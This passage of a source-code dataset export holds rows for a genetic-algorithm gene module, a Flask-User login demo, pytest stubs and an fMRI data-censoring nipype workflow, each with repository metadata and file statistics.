result = max(result, minVal)
return int(round(result))
def mutator(originalValue, chromosome):
stdev = mutationSTDEV
if mutatorGene is not None:
stdev = chromosome[mutatorGene]
result = originalValue + random.normalvariate(averageMutation, stdev)
result = max(min(result, maxVal), minVal)
return int(round(result))
return GeneType(generator, mutator, description)
##################################################################################################
def BoolGeneType(description,
probabilityTrue=0.5,
mutationProbability=1.0):
"""
Return a gene of type bool configured as specified
:param description: the description/name of the gene
:type description: str
:param probabilityTrue: The probability that a randomly generated gene is true
:type probabilityTrue: float
:param mutationProbability: The probability that this gene will "flip" when mutated
:type mutationProbability: float
:rtype: GeneType
"""
def generator():
return random.uniform(0.0, 1.0) < probabilityTrue
def mutator(originalValue, chromosome):
if random.uniform(0.0, 1.0) <= mutationProbability:
return not originalValue
else:
return originalValue
return GeneType(generator, mutator, description)
##################################################################################################
def FloatInverseFit(description, maxVal=1, startVal=1):
"""
This gene does not mutate randomly, instead it is set to the inverse of the fitness
Good for mutator genes
:param description: the description/name of the GeneType
:param maxVal: the maximum value that this GeneType is allowed to hold
:param startVal: the starting value of this gene
"""
def generator():
return startVal
def mutator(originalValue, chromosome):
fitness = chromosome.getFitness()
if fitness != 0:
val = 1.0 / fitness
if val < maxVal:
return val
return originalValue
return GeneType(generator, mutator, description)
| 40.027933
| 117
| 0.617865
| 809
| 7,165
| 5.472188
| 0.153276
| 0.023492
| 0.010843
| 0.016264
| 0.812514
| 0.796928
| 0.78857
| 0.729388
| 0.729388
| 0.716512
| 0
| 0.004916
| 0.2903
| 7,165
| 179
| 118
| 40.027933
| 0.865683
| 0.474669
| 0
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141176
| false
| 0
| 0.035294
| 0.023529
| 0.364706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a574e08564e89d384a3155d893696c2f1cc569a
| 3,255
|
py
|
Python
|
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, render_template_string
from flask_user import login_required, roles_required
main = Blueprint('main', __name__)
@main.route('/')
def home_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Home page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
# The Members page is only accessible to authenticated users
@main.route('/members')
@login_required # Use of @login_required decorator
def member_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Members page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
# The Admin page requires an 'Admin' role.
@main.route('/admin')
@roles_required('Admin') # Use of @roles_required decorator
def admin_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Admin Page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
| 57.105263
| 150
| 0.560061
| 406
| 3,255
| 4.339901
| 0.140394
| 0.020431
| 0.061294
| 0.091941
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0
| 0.004737
| 0.221813
| 3,255
| 56
| 151
| 58.125
| 0.69088
| 0.050691
| 0
| 0.702128
| 0
| 0.382979
| 0.865802
| 0.267423
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0.12766
| 0.042553
| 0.06383
| 0.170213
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
2a7483a60f657fb57a78c8eaf79af4053d7688b9
| 35
|
py
|
Python
|
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
from ._load_deap import load_deap
| 11.666667
| 33
| 0.828571
| 6
| 35
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 35
| 2
| 34
| 17.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aade78f5d472edef9a3d28a0ac38ebfe1562e211
| 417
|
py
|
Python
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-reward-function
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | 1
|
2021-08-12T03:36:01.000Z
|
2021-08-12T03:36:01.000Z
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-reward-function
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | 14
|
2021-08-11T00:32:46.000Z
|
2021-08-24T00:34:25.000Z
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-robotics-reward
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.mark.xfail
def test_srr_file() -> None:
"""
Performs a smoke test that srr with a file actually produces a roughly correct reward signal.
"""
raise NotImplementedError()
@pytest.mark.xfail
def test_srr_webcam() -> None:
"""
Performs a smoke test that srr with a (mock) webcam actually produces a roughly correct reward signal.
"""
raise NotImplementedError()
| 23.166667
| 106
| 0.70024
| 55
| 417
| 5.236364
| 0.436364
| 0.069444
| 0.104167
| 0.125
| 0.875
| 0.875
| 0.701389
| 0.701389
| 0.701389
| 0
| 0
| 0
| 0.213429
| 417
| 17
| 107
| 24.529412
| 0.878049
| 0.470024
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2aafb9f6f6a94dbbca502ba2311dcb1459932882
| 25,357
|
py
|
Python
|
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | 5
|
2018-06-12T08:17:13.000Z
|
2022-02-25T20:07:00.000Z
|
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | null | null | null |
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | 2
|
2020-10-19T15:27:28.000Z
|
2021-06-04T17:02:27.000Z
|
def datacens_workflow_percent(SinkTag="func_preproc", wf_name="data_censoring"):
"""
Modified version of CPAC.scrubbing.scrubbing +
CPAC.generate_motion_statistics.generate_motion_statistics +
CPAC.func_preproc.func_preproc
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/scrubbing/scrubbing.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/generate_motion_statistics/generate_motion_statistics.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/func_preproc/func_preproc.html`
Description:
Do the data censoring on the 4D functional data. First, it calculates the framewise displacement according to Power's method. Second, it
indexes the volumes which FD is in the upper part in percent(determined by the threshold variable which is 5% by default). Thirdly, it excludes those volumes and one volume
before and 2 volumes after the indexed volume. The workflow returns a 4D scrubbed functional data.
Workflow inputs:
:param func: The reoriented,motion occrected, nuissance removed and bandpass filtered functional file.
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: datacens_workflow - workflow
Balint Kincses
kincses.balint@med.u-szeged.hu
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accurate linear registration and motion correction of brain images. Neuroimage 17, 825-841.
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold']),
name='inputspec')
inputspec.inputs.threshold = 5
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
# Determine the indices of the upper part (which is defined by the threshold, deafult 5%) of values based on their FD values
calc_upprperc = pe.MapNode(utility.Function(input_names=['in_file',
'threshold'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'out_file', 'nvol'],
function=calculate_upperpercent),
iterfield=['in_file'],
name='calculate_upperpercent')
# Generate the weird input for the scrubbing procedure which is done in afni
craft_scrub_input = pe.MapNode(utility.Function(input_names=['scrub_input', 'frames_in_1D_file'],
output_names=['scrub_input_string'],
function=get_indx),
iterfield=['scrub_input', 'frames_in_1D_file'],
name='scrubbing_craft_input_string')
# Scrub the image
scrubbed_preprocessed = pe.MapNode(utility.Function(input_names=['scrub_input'],
output_names=['scrubbed_image'],
function=scrub_image),
iterfield=['scrub_input'],
name='scrubbed_preprocessed')
myqc = qc.timecourse2png("timeseries", tag="040_censored")
outputspec = pe.Node(utility.IdentityInterface(fields=['scrubbed_image', 'FD']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', calc_upprperc, 'in_file')
analysisflow.connect(inputspec, 'threshold', calc_upprperc, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(calc_upprperc, 'frames_in_idx', craft_scrub_input, 'frames_in_1D_file')
analysisflow.connect(calc_upprperc, 'out_file', ds, 'percentFD') # TODO save this in separet folder for QC
analysisflow.connect(inputspec, 'func', craft_scrub_input, 'scrub_input')
# Do the scubbing
analysisflow.connect(craft_scrub_input, 'scrub_input_string', scrubbed_preprocessed, 'scrub_input')
# Output
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', outputspec, 'scrubbed_image')
analysisflow.connect(inputspec, 'FD', outputspec, 'FD') #TODO: scrub FD file, as well
# Save a few files
#analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', ds, 'scrubbed_image')
#analysisflow.connect(calc_upprperc, 'percentFD', ds, 'scrubbed_image.@numberofvols')
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', myqc, 'inputspec.func')
return analysisflow
def datacens_workflow_threshold(SinkTag="func_preproc", wf_name="data_censoring", ex_before=1, ex_after=2):
"""
Modified version of CPAC.scrubbing.scrubbing +
CPAC.generate_motion_statistics.generate_motion_statistics +
CPAC.func_preproc.func_preproc
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/scrubbing/scrubbing.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/generate_motion_statistics/generate_motion_statistics.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/func_preproc/func_preproc.html`
Description:
Do the data censoring on the 4D functional data. First, it calculates the framewise displacement according to Power's method. Second, it
indexes the volumes which FD is in the upper part in percent(determined by the threshold variable which is 5% by default). Thirdly, it excludes those volumes and one volume
before and 2 volumes after the indexed volume. The workflow returns a 4D scrubbed functional data.
Workflow inputs:
:param func: The reoriented,motion occrected, nuissance removed and bandpass filtered functional file.
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: datacens_workflow - workflow
Balint Kincses
kincses.balint@med.u-szeged.hu
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accurate linear registration and motion correction of brain images. Neuroimage 17, 825-841.
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.utils_convert as utils_convert
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold']),
name='inputspec')
inputspec.inputs.threshold = 0.2 #mm
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
above_thr = pe.MapNode(utility.Function(input_names=['in_file',
'threshold',
'frames_before',
'frames_after'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'percent_scrubbed_file', 'fd_scrubbed_file', 'nvol'],
function=above_threshold),
iterfield=['in_file'],
name='above_threshold')
above_thr.inputs.frames_before = ex_before
above_thr.inputs.frames_after = ex_after
# Save outputs which are important
ds_fd_scrub = pe.Node(interface=io.DataSink(),
name='ds_fd_scrub')
ds_fd_scrub.inputs.base_directory = SinkDir
ds_fd_scrub.inputs.regexp_substitutions = [("(\/)[^\/]*$", "FD_scrubbed.csv")]
pop_perc_scrub = pe.Node(interface=utils_convert.List2TxtFileOpen,
name='pop_perc_scrub')
# save data out with Datasink
ds_pop_perc_scrub = pe.Node(interface=io.DataSink(), name='ds_pop_perc_scrub')
ds_pop_perc_scrub.inputs.regexp_substitutions = [("(\/)[^\/]*$", "pop_percent_scrubbed.txt")]
ds_pop_perc_scrub.inputs.base_directory = SinkDir
# Generate the weird input for the scrubbing procedure which is done in afni
craft_scrub_input = pe.MapNode(utility.Function(input_names=['scrub_input', 'frames_in_1D_file'],
output_names=['scrub_input_string'],
function=get_indx),
iterfield=['scrub_input', 'frames_in_1D_file'],
name='scrubbing_craft_input_string')
# Scrub the image
scrubbed_preprocessed = pe.MapNode(utility.Function(input_names=['scrub_input'],
output_names=['scrubbed_image'],
function=scrub_image),
iterfield=['scrub_input'],
name='scrubbed_preprocessed')
myqc = qc.timecourse2png("timeseries", tag="040_censored")
outputspec = pe.Node(utility.IdentityInterface(fields=['scrubbed_image', 'FD_scrubbed']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', above_thr, 'in_file')
analysisflow.connect(inputspec, 'threshold', above_thr, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(above_thr, 'frames_in_idx', craft_scrub_input, 'frames_in_1D_file')
analysisflow.connect(above_thr, 'percent_scrubbed_file', ds, 'percentFD') # TODO save this in separate folder for QC
analysisflow.connect(inputspec, 'func', craft_scrub_input, 'scrub_input')
# Do the scubbing
analysisflow.connect(craft_scrub_input, 'scrub_input_string', scrubbed_preprocessed, 'scrub_input')
# Output
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', outputspec, 'scrubbed_image')
analysisflow.connect(above_thr, 'fd_scrubbed_file', outputspec, 'FD_scrubbed') #TODO_ready: scrub FD file, as well
analysisflow.connect(above_thr, 'fd_scrubbed_file', ds_fd_scrub, 'FD_scrubbed')
analysisflow.connect(above_thr, 'percent_scrubbed_file', pop_perc_scrub, 'in_list')
analysisflow.connect(pop_perc_scrub, 'txt_file', ds_pop_perc_scrub, 'pop')
# Save a few files
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', ds, 'scrubbed_image')
#analysisflow.connect(above_thr, 'percentFD', ds, 'scrubbed_image.@numberofvols')
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', myqc, 'inputspec.func')
return analysisflow
def spikereg_workflow(SinkTag="func_preproc", wf_name="data_censoring_despike"):
"""
Description:
Calculates volumes to be excluded, creates the despike regressor matrix
Workflow inputs:
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: spikereg_workflow - workflow
Tamas Spisak
tamas.spisak@uk-essen.de
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accuratedef datacens_workflow(SinkTag="func_preproc", wf_name="data_censoring"):
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold',]),
name='inputspec')
inputspec.inputs.threshold = 5
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
# Determine the indices of the upper part (which is defined by the threshold, deafult 5%) of values based on their FD values
calc_upprperc = pe.MapNode(utility.Function(input_names=['in_file',
'threshold'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'out_file', 'nvol'],
function=calculate_upperpercent),
iterfield=['in_file'],
name='calculate_upperpercent')
#create despiking matrix, to be included into nuisance correction
despike_matrix = pe.MapNode(utility.Function(input_names=['frames_excluded', 'total_vols'],
output_names=['despike_mat'],
function=create_despike_regressor_matrix),
iterfield=['frames_excluded', 'total_vols'],
name='create_despike_matrix')
outputspec = pe.Node(utility.IdentityInterface(fields=['despike_mat', 'FD']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', calc_upprperc, 'in_file')
analysisflow.connect(inputspec, 'threshold', calc_upprperc, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(calc_upprperc, 'frames_out_idx', despike_matrix, 'frames_excluded')
analysisflow.connect(calc_upprperc, 'nvol', despike_matrix, 'total_vols')
analysisflow.connect(calc_upprperc, 'out_file', ds, 'percentFD') # TODO save this in separet folder for QC
# Output
analysisflow.connect(despike_matrix, 'despike_mat', outputspec, 'despike_mat')
analysisflow.connect(inputspec, 'FD', outputspec, 'FD')
return analysisflow
def above_threshold(in_file, threshold=0.2, frames_before=1, frames_after=2):
import os
import numpy as np
from numpy import loadtxt, savetxt
powersFD_data = loadtxt(in_file, skiprows=1)
np.insert(powersFD_data, 0, 0) # TODO_ready: why do we need this: see output of nipype.algorithms.confounds.FramewiseDisplacement
frames_in_idx = np.argwhere(powersFD_data < threshold)[:, 0]
frames_out = np.argwhere(powersFD_data >= threshold)[:, 0]
extra_indices = []
for i in frames_out:
# remove preceding frames
if i > 0:
count = 1
while count <= frames_before:
extra_indices.append(i - count)
count += 1
# remove following frames
count = 1
while count <= frames_after:
if i+count < len(powersFD_data): # do not censor unexistent data
extra_indices.append(i + count)
count += 1
indices_out = list(set(frames_out) | set(extra_indices))
indices_out.sort()
frames_out_idx = indices_out
frames_in_idx = np.setdiff1d(frames_in_idx, indices_out)
FD_scrubbed = powersFD_data[frames_in_idx]
fd_scrubbed_file = os.path.join(os.getcwd(), 'FD_scrubbed.csv')
savetxt(fd_scrubbed_file, FD_scrubbed, delimiter=",")
frames_in_idx_str = ','.join(str(x) for x in frames_in_idx)
frames_in_idx = frames_in_idx_str.split()
percentFD = (len(frames_out_idx) * 100 / (len(powersFD_data) + 1)) # % of frames censored
percent_scrubbed_file = os.path.join(os.getcwd(), 'percent_scrubbed.txt')
f = open(percent_scrubbed_file, 'w')
f.write("%.3f" % (percentFD))
f.close()
nvol = len(powersFD_data)
return frames_in_idx, frames_out_idx, percentFD, percent_scrubbed_file, fd_scrubbed_file, nvol
def calculate_upperpercent(in_file,threshold, frames_before=1, frames_after=2):
import os
import numpy as np
from numpy import loadtxt
# Receives the FD file to calculate the upper percent of violating volumes
powersFD_data = loadtxt(in_file, skiprows=1)
np.insert(powersFD_data, 0, 0) # TODO_ready: why do we need this: see output of nipype.algorithms.confounds.FramewiseDisplacement
sortedpwrsFDdata = sorted(powersFD_data)
limitvalueindex = int(len(sortedpwrsFDdata) * threshold / 100)
limitvalue = sortedpwrsFDdata[len(sortedpwrsFDdata) - limitvalueindex]
frames_in_idx = np.argwhere(powersFD_data < limitvalue)[:,0]
frames_out = np.argwhere(powersFD_data >= limitvalue)[:, 0]
extra_indices = []
for i in frames_out:
# remove preceding frames
if i > 0:
count = 1
while count <= frames_before:
extra_indices.append(i - count)
count += 1
# remove following frames
count = 1
while count <= frames_after:
if i+count < len(powersFD_data): # do not censor unexistent data
extra_indices.append(i + count)
count += 1
indices_out = list(set(frames_out) | set(extra_indices))
indices_out.sort()
frames_out_idx=indices_out
frames_in_idx=np.setdiff1d(frames_in_idx, indices_out)
frames_in_idx_str = ','.join(str(x) for x in frames_in_idx)
frames_in_idx = frames_in_idx_str.split()
percentFD =100- (len(frames_out_idx) * 100 / (len(powersFD_data) + 1))
out_file = os.path.join(os.getcwd(), 'numberofcensoredvolumes.txt')
f = open(out_file, 'w')
f.write("%.3f," % (percentFD))
f.close()
nvol=len(powersFD_data)
return frames_in_idx, frames_out_idx, percentFD, out_file, nvol
def get_indx(scrub_input, frames_in_1D_file):
"""
Method to get the list of time
frames that are to be included
Parameters
----------
in_file : string
path to file containing the valid time frames
Returns
-------
scrub_input_string : string
input string for 3dCalc in scrubbing workflow,
looks something like " 4dfile.nii.gz[0,1,2,..100] "
"""
#f = open(frames_in_1D_file, 'r')
#line = f.readline()
#line = line.strip(',')
frames_in_idx_str = '[' + ','.join(str(x) for x in frames_in_1D_file) + ']'
#if line:
# indx = map(int, line.split(","))
#else:
# raise Exception("No time points remaining after scrubbing.")
#f.close()
#scrub_input_string = scrub_input + str(indx).replace(" ", "")
scrub_input_string = scrub_input + frames_in_idx_str
return scrub_input_string
def scrub_image(scrub_input):
"""
Method to run 3dcalc in order to scrub the image. This is used instead of
the Nipype interface for 3dcalc because functionality is needed for
specifying an input file with specifically-selected volumes. For example:
input.nii.gz[2,3,4,..98], etc.
Parameters
----------
scrub_input : string
path to 4D file to be scrubbed, plus with selected volumes to be
included
Returns
-------
scrubbed_image : string
path to the scrubbed 4D file
"""
import os
os.system("3dcalc -a %s -expr 'a' -prefix scrubbed_preprocessed.nii.gz" % scrub_input)
scrubbed_image = os.path.join(os.getcwd(), "scrubbed_preprocessed.nii.gz")
return scrubbed_image
def create_despike_regressor_matrix(frames_excluded, total_vols):
# adapted from C-PAC
"""Create a Numpy array describing which volumes are to be regressed out
during nuisance regression, for de-spiking.
:param frames_excluded: 1D file of the volume indices to be excluded. This
is a 1D text file of integers separated by commas.
:param total_vols: integer value of the length of the time series (number
of volumes).
:return: tsv file consisting of a row for every volume, and a column
for every volume being regressed out, with a 1 where they match.
"""
import numpy as np
import os
#with open(frames_excluded, 'r') as f:
# excl_vols = f.readlines()
excl_vols=frames_excluded
if len(excl_vols) <= 0:
return None
reg_matrix = np.zeros((total_vols, len(excl_vols)), dtype=int)
i = 0
for vol in excl_vols:
reg_matrix[vol][i] = 1
i += 1
np.savetxt("despike_matrix.csv", reg_matrix)
return os.path.join(os.getcwd(),"despike_matrix.csv")
| 44.175958
| 199
| 0.651694
| 3,102
| 25,357
| 5.159574
| 0.141199
| 0.021243
| 0.016495
| 0.00956
| 0.800625
| 0.785629
| 0.764449
| 0.737894
| 0.727773
| 0.719775
| 0
| 0.016458
| 0.254762
| 25,357
| 573
| 200
| 44.253054
| 0.830502
| 0.417321
| 0
| 0.645161
| 1
| 0
| 0.135937
| 0.025069
| 0.004032
| 0
| 0
| 0.005236
| 0
| 1
| 0.032258
| false
| 0
| 0.125
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
